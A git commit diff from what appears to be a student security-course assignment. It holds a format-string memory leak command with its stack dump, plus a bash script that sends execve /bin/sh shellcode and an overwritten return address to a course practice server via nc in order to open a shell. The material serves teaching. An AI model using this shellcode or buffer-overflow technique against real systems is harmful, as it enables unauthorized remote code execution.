Finished assignemnt 5b

diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2 b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
index 21c3798..834ddc7 100644 (file)
--- a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
+++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2
@@ -3,26 +3,66 @@ The buffer is probably 104 characters wide. All characters over 104 will not be
 echoed.
 
 b,c)
-printf "%20s\n" | sed 's/ /%lx&/g' | nc hackme.cs.ru.nl 2266
+printf "%52s\n" | sed 's/ /%p/g' | nc hackme.cs.ru.nl 2266 |\ sed 's/(nil)\|0x/\n&/g'
 
 Memory:
-7ffff7ff8050
-7ffff7dd8de0
-fbad2088
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-20786c2520786c25
-7fffffffeb00           saved frame pointer
-4004c1                 return address
-1                      return value
-7fffffffeb30
-7fffffffebc0
+0x7ffff7ff8066
+0x7ffff7dd8de0
+0xfbad2088
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x7025702570257025
+0x702570257025
+0x7fffffffeb40
+0x7fffffffebd0         Saved frame pointer
+0x4006a9               Return pointer
+(nil)
+0x100400530
+0x7fffffffebe0
+0x4006c2
+(nil)
+0x7ffff7a70ead
+(nil)
+0x7fffffffecc8
+0x100000000
+0x4006b9
+(nil)
+0x1aad25fd1bef7a81
+0x400530
+0x7fffffffecc0
+(nil)
+(nil)
+0xe552da02cc0f7a81
+0xe552cab3073f7a81
+0x7fff00000000
+(nil)
+(nil)
+0x4006e0
+0x7fffffffecc8
+0x1
+(nil)
+(nil)
+0x400530
+0x7fffffffecc0
+(nil)
+0x400559
+
+30 bytes shell codes
+14 bytes in de zooi
+94 bytes zooi
+
+104 zooi
+8 bytes waarde?
+8 frame pointer?
+8 return pointer

diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh
index 2f62e90..0839a7b 100644 (file)
--- a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh
+++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2e.sh
@@ -1,11 +1,10 @@
-shellcode="\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
-
-#Illegal instruction
-returnvalue="\x7f\xff\xf7\xff\xeb\x30"
-fillers=$(printf "%42s" | sed 's/ /\\x0f\\x1f/g')
-
-returnvalue="\x7f\xff\xf7\xff\xeb\x30"
-fillers=$(printf "%39s" | sed 's/ /\\x0f\\x1f/g')
-
-
-cat <(echo -e "${fillers}${shellcode}${returnvalue}\n") - | nc hackme.cs.ru.nl 2266
+{      # Print padding and stack inspection
+       printf "......%34s" | sed 's/ /%p/g'
+       # Print shell code
+       printf "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1"
+       printf "\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05"
+       # Overwrite frame pointer and top of stack pointer print return address
+       printf "%16s\x50\xeb\xff\xff\xff\x7f\n"
+       # Start reading from stdin and echoing it to stdout
+       cat
+} | nc hackme.cs.ru.nl 2266

diff --git a/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2f b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2f
new file mode 100644 (file)
index 0000000..7213a3c
--- /dev/null
+++ b/ass5b/mart/sws1-assignment5b-s4109503-s4202015/exercise2f
@@ -0,0 +1 @@
+Just run exercise2e.sh with bash and it will open a shell.